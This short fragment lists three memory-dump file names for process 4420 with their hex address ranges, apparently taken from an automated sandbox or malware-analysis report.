memory/4420-256-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4420-257-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

memory/4420-258-0x000001E82CE60000-0x000001E82CE70000-memory.dmp